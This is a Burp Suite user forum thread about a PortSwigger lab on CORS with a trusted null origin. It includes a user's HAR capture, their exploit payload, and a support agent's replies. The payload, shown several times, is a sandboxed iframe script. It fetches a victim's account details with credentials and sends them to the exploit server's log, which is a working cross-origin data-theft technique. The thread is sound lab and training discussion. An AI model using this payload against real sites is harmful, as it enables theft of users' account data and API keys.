Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab CORS vulnerability with trusted null origin: CORS missing allow origin

filippo | Last updated: Feb 07, 2023 02:31PM UTC

Good evening, I'm struggling to solve the lab, it seems to me that the CORS policy is not configured according to the LAB. Following there's my HAR file generated trying to view the exploit. TIA ################################################################################################ { "log": { "version": "1.2", "creator": { "name": "Firefox", "version": "109.0.1" }, "browser": { "name": "Firefox", "version": "109.0.1" }, "pages": [ { "startedDateTime": "2023-02-07T15:27:39.875+01:00", "id": "page_1", "title": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit", "pageTimings": { "onContentLoad": 826, "onLoad": 898 } } ], "entries": [ { "pageref": "page_1", "startedDateTime": "2023-02-07T15:27:39.875+01:00", "request": { "bodySize": 598, "method": "POST", "url": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/", "httpVersion": "HTTP/2", "headers": [ { "name": "Host", "value": "exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net" }, { "name": "User-Agent", "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" }, { "name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" }, { "name": "Accept-Language", "value": "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3" }, { "name": "Accept-Encoding", "value": "gzip, deflate, br" }, { "name": "Content-Type", "value": "application/x-www-form-urlencoded" }, { "name": "Content-Length", "value": "598" }, { "name": "Origin", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net" }, { "name": "Connection", "value": "keep-alive" }, { "name": "Referer", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/" }, { "name": "Upgrade-Insecure-Requests", "value": "1" }, { "name": "Sec-Fetch-Dest", "value": "document" }, { "name": "Sec-Fetch-Mode", "value": "navigate" }, { "name": "Sec-Fetch-Site", "value": "same-origin" }, { "name": "Sec-Fetch-User", "value": "?1" }, { "name": "TE", "value": "trailers" } ], "cookies": [], "queryString": [], "headersSize": 746, "postData": { "mimeType": "application/x-www-form-urlencoded", "params": [ { "name": "urlIsHttps", "value": "on" }, { "name": "responseFile", "value": "/exploit" }, { "name": "responseHead", "value": "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8" }, { "name": "responseBody", "value": "<iframe style=\"visibility:hidden\" sandbox=\"allow-scripts\" srcdoc=\"<script> fetch('https://0a9400f0049d2321c133bcfa000500a3.web-security-academy.net/accountDetails', {credentials: 'include'}).then(response => response.text()).then((response) => document.location='/log?k='+encodeURIComponent(response));</script>\"></iframe>\r\n" }, { "name": "formAction", "value": "VIEW_EXPLOIT" } ], "text": "urlIsHttps=on&responseFile=%2Fexploit&responseHead=HTTP%2F1.1+200+OK%0D%0AContent-Type%3A+text%2Fhtml%3B+charset%3Dutf-8&responseBody=%3Ciframe+style%3D%22visibility%3Ahidden%22+sandbox%3D%22allow-scripts%22+srcdoc%3D%22%3Cscript%3E+fetch%28%27https%3A%2F%2F0a9400f0049d2321c133bcfa000500a3.web-security-academy.net%2FaccountDetails%27%2C+%7Bcredentials%3A+%27include%27%7D%29.then%28response+%3D%3E+response.text%28%29%29.then%28%28response%29+%3D%3E+document.location%3D%27%2Flog%3Fk%3D%27%2BencodeURIComponent%28response%29%29%3B%3C%2Fscript%3E%22%3E%3C%2Fiframe%3E%0D%0A&formAction=VIEW_EXPLOIT" } }, "response": { "status": 302, "statusText": "Found", "httpVersion": "HTTP/2", "headers": [ { "name": "location", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit" }, { "name": "server", "value": "Academy Exploit Server" }, { "name": "content-length", "value": "0" }, { "name": "X-Firefox-Spdy", "value": "h2" } ], "cookies": [], "content": { "mimeType": "text/html; charset=utf-8", "size": 324, "comment": "Il corpo delle risposte non è incluso." }, "redirectURL": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit", "headersSize": 178, "bodySize": 502 }, "cache": {}, "timings": { "blocked": 16, "dns": 0, "connect": 0, "ssl": 0, "send": 0, "wait": 346, "receive": 0 }, "time": 362, "_securityState": "secure", "serverIPAddress": "127.0.0.1", "connection": "8080" }, { "pageref": "page_1", "startedDateTime": "2023-02-07T15:27:40.252+01:00", "request": { "bodySize": 0, "method": "GET", "url": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit", "httpVersion": "HTTP/2", "headers": [ { "name": "Host", "value": "exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net" }, { "name": "User-Agent", "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" }, { "name": "Accept", "value": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" }, { "name": "Accept-Language", "value": "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3" }, { "name": "Accept-Encoding", "value": "gzip, deflate, br" }, { "name": "Referer", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/" }, { "name": "Connection", "value": "keep-alive" }, { "name": "Upgrade-Insecure-Requests", "value": "1" }, { "name": "Sec-Fetch-Dest", "value": "document" }, { "name": "Sec-Fetch-Mode", "value": "navigate" }, { "name": "Sec-Fetch-Site", "value": "same-origin" }, { "name": "Sec-Fetch-User", "value": "?1" }, { "name": "TE", "value": "trailers" } ], "cookies": [], "queryString": [], "headersSize": 605 }, "response": { "status": 200, "statusText": "OK", "httpVersion": "HTTP/2", "headers": [ { "name": "content-type", "value": "text/html; charset=utf-8" }, { "name": "server", "value": "Academy Exploit Server" }, { "name": "content-length", "value": "324" }, { "name": "X-Firefox-Spdy", "value": "h2" } ], "cookies": [], "content": { "mimeType": "text/html; charset=utf-8", "size": 324, "text": "<iframe style=\"visibility:hidden\" sandbox=\"allow-scripts\" srcdoc=\"<script> fetch('https://0a9400f0049d2321c133bcfa000500a3.web-security-academy.net/accountDetails', {credentials: 'include'}).then(response => response.text()).then((response) => document.location='/log?k='+encodeURIComponent(response));</script>\"></iframe>\r\n" }, "redirectURL": "", "headersSize": 130, "bodySize": 454 }, "cache": {}, "timings": { "blocked": 0, "dns": 0, "connect": 0, "ssl": 0, "send": 0, "wait": 408, "receive": 0 }, "time": 408, "_securityState": "secure", "serverIPAddress": "127.0.0.1", "connection": "8080" }, { "pageref": "page_1", "startedDateTime": "2023-02-07T15:27:40.797+01:00", "request": { "bodySize": 0, "method": "GET", "url": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/favicon.ico", "httpVersion": "HTTP/2", "headers": [ { "name": "Host", "value": "exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net" }, { "name": "User-Agent", "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" }, { "name": "Accept", "value": "image/avif,image/webp,*/*" }, { "name": "Accept-Language", "value": "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3" }, { "name": "Accept-Encoding", "value": "gzip, deflate, br" }, { "name": "Connection", "value": "keep-alive" }, { "name": "Referer", "value": "https://exploit-0a02002b043a231dc178bbfe01b70031.exploit-server.net/exploit" }, { "name": "Sec-Fetch-Dest", "value": "image" }, { "name": "Sec-Fetch-Mode", "value": "no-cors" }, { "name": "Sec-Fetch-Site", "value": "same-origin" } ], "cookies": [], "queryString": [], "headersSize": null }, "response": { "status": 200, "statusText": "OK", "httpVersion": "HTTP/2", "headers": [ { "name": "content-type", "value": "image/x-icon" }, { "name": "content-length", "value": "15406" }, { "name": "X-Firefox-Spdy", "value": "h2" } ], "cookies": [], "content": { "mimeType": "image/x-icon", "size": 15406, "encoding": "base64", "text": "AAA....AAA==" }, "redirectURL": "", "headersSize": 0, "bodySize": 15406 }, "cache": {}, "timings": { "blocked": 0, "dns": 0, "ssl": 0, "connect": 0, "send": 0, "wait": 0, "receive": 0 }, "time": 0, "_securityState": "secure" }, { "pageref": "page_1", "startedDateTime": "2023-02-07T15:27:40.817+01:00", "request": { "bodySize": 0, "method": "GET", "url": "https://0a9400f0049d2321c133bcfa000500a3.web-security-academy.net/accountDetails", "httpVersion": "HTTP/2", "headers": [ { "name": "Host", "value": "0a9400f0049d2321c133bcfa000500a3.web-security-academy.net" }, { "name": "User-Agent", "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" }, { "name": "Accept", "value": "*/*" }, { "name": "Accept-Language", "value": "it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3" }, { "name": "Accept-Encoding", "value": "gzip, deflate, br" }, { "name": "Origin", "value": "null" }, { "name": "Connection", "value": "keep-alive" }, { "name": "Sec-Fetch-Dest", "value": "empty" }, { "name": "Sec-Fetch-Mode", "value": "cors" }, { "name": "Sec-Fetch-Site", "value": "cross-site" } ], "cookies": [], "queryString": [], "headersSize": 405 }, "response": { "status": 401, "statusText": "Unauthorized", "httpVersion": "HTTP/2", "headers": [ { "name": "content-type", "value": "application/json; charset=utf-8" }, { "name": "set-cookie", "value": "session=eYgx2IMcOY58i6DLFRw2KQxHHcYrievz; Secure; HttpOnly; SameSite=None" }, { "name": "content-length", "value": "14" }, { "name": "X-Firefox-Spdy", "value": "h2" } ], "cookies": [ { "name": "session", "value": "eYgx2IMcOY58i6DLFRw2KQxHHcYrievz" } ], "content": { "mimeType": "application/json; charset=utf-8", "size": 0, "text": "" }, "redirectURL": "", "headersSize": 201, "bodySize": 201 }, "cache": {}, "timings": { "blocked": 0, "dns": 1, "connect": 1, "ssl": 0, "send": 47, "wait": -1, "receive": 7576 }, "time": 7625, "_securityState": "secure", "serverIPAddress": "127.0.0.1", "connection": "8080" } ] } }

filippo | Last updated: Feb 08, 2023 07:46AM UTC

Good morning, actually the lab is solved, I mean delivering the exploit to the victim works, and I can see the log's entry containing administrator data in QS, but I cannot understand why my request is blocked viewing the exploit. TIA Filippo

Hannah, PortSwigger Agent | Last updated: Feb 08, 2023 10:02AM UTC

Hi To clarify, when you click on the "View exploit" button, you are not landing on the log page with your API key in the URL? Have you tried following any of the video solutions available?

filippo | Last updated: Feb 08, 2023 03:39PM UTC

Hi Hannah, no, I didn't follow any solutions, apart yours that confirms, even if I used fetch instead of xhr, that my exploit is correct. As I wrote before when I view the exploit I got 401 response from the fetch request to the accountDetails page and I see the iframe without any content loaded. Of course no releated entry is present in the access log, but delivering the exploit to the victim permits to solve the lab. Anyway I dont understand why my fetch request is blocked. I enclose the payload I used: <iframe style="visibility:block" sandbox="allow-scripts" srcdoc="<script> fetch('https://<my_lab_id>.web-security-academy.net/accountDetails', {credentials: 'include'}).then(response => response.text()).then((response) => document.location='/log?k='+encodeURIComponent(response));</script>"></iframe> Thanx F.

Hannah, PortSwigger Agent | Last updated: Feb 14, 2023 11:55AM UTC

Hi Filippo When using your payload and the "View exploit" button, I get directed to the log page in the iFrame. When viewing the log page after the exploit has been delivered, I see that my user has visited the access log with the username and API key in the URL. Please note that your user must be logged into their account when viewing the exploit. If you'd like to include some screenshots or a screen recording of the behavior you see, please drop us an email at support@portswigger.net so we can look into this further.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.